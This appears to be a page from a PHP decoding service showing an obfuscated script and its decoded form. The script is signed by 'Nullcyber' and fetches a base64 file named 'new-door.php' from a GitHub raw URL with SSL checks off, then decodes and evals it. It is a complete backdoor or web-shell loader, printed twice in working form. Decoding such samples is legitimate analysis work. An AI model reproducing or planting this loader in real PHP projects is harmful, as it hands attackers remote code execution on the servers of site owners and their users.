Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* encrypt by Nullcyber | Telegram @Nullcyber_X */ function get_contents($url) { ..

Decoded Output download

<?php 
/* encrypt by Nullcyber | Telegram @Nullcyber_X */ 
 function get_contents($url) { goto imZVttaGrJ; W8E0dbuEcr: Kq_omMN_MJ: $result = ''; XiaH3ulpvm: if (feof($fp)) { goto b01DDJIpFm; } $result .= fread($fp, 8192); goto aeVT4fiS2k; aeVT4fiS2k: goto XiaH3ulpvm; b01DDJIpFm: fclose($fp); return $result; goto x5wsYLvn0z; imZVttaGrJ: $opts = array("http" => array("method" => "GET", "header" => "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
\xa"), "ssl" => array("verify_peer" => false, "verify_peer_name" => false)); $context = stream_context_create($opts); $fp = fopen($url, "r", false, $context); if ($fp) { goto Kq_omMN_MJ; } return false; goto W8E0dbuEcr; x5wsYLvn0z: } $url = "https://raw.githubusercontent.com/Cnull00/shellsup/refs/heads/main/new-door.php"; $encoded_code = get_contents($url); $decoded_code = base64_decode($encoded_code); eval("?>" . $decoded_code); ?>

Did this file decode correctly?

Original Code

<?php
/* encrypt by Nullcyber | Telegram @Nullcyber_X */
 function get_contents($url) { goto imZVttaGrJ; W8E0dbuEcr: Kq_omMN_MJ: $result = ''; XiaH3ulpvm: if (feof($fp)) { goto b01DDJIpFm; } $result .= fread($fp, 8192); goto aeVT4fiS2k; aeVT4fiS2k: goto XiaH3ulpvm; b01DDJIpFm: fclose($fp); return $result; goto x5wsYLvn0z; imZVttaGrJ: $opts = array("\x68\x74\x74\160" => array("\155\x65\164\150\157\144" => "\107\105\x54", "\x68\145\x61\x64\145\162" => "\x55\x73\145\x72\55\101\x67\x65\156\x74\x3a\x20\x4d\157\x7a\151\x6c\x6c\x61\x2f\65\56\60\40\x28\x57\151\x6e\x64\x6f\x77\163\x20\116\124\40\x36\56\x31\73\40\162\x76\72\x33\62\56\x30\x29\40\107\x65\143\x6b\x6f\57\x32\x30\61\60\x30\x31\x30\61\x20\x46\x69\162\145\146\157\x78\x2f\x33\x32\56\60\15\xa"), "\x73\x73\x6c" => array("\166\145\162\x69\146\x79\x5f\x70\145\x65\x72" => false, "\166\x65\x72\x69\146\171\137\x70\x65\145\162\137\156\x61\x6d\x65" => false)); $context = stream_context_create($opts); $fp = fopen($url, "\162", false, $context); if ($fp) { goto Kq_omMN_MJ; } return false; goto W8E0dbuEcr; x5wsYLvn0z: } $url = "\150\164\x74\x70\x73\x3a\57\x2f\162\141\167\56\147\x69\x74\150\165\142\165\163\145\x72\x63\x6f\156\x74\145\x6e\164\56\143\157\x6d\57\x43\x6e\x75\x6c\x6c\60\60\57\163\x68\145\154\154\163\165\160\x2f\162\145\146\163\x2f\150\145\141\144\163\57\x6d\141\x69\156\57\156\x65\167\x2d\x64\157\157\x72\x2e\x70\150\x70"; $encoded_code = get_contents($url); $decoded_code = base64_decode($encoded_code); eval("\x3f\x3e" . $decoded_code);

Function Calls

None

Variables

None

Stats

MD5 85358932fe779ce7616662d39016a1c2
Eval Count 0
Decode Time 155 ms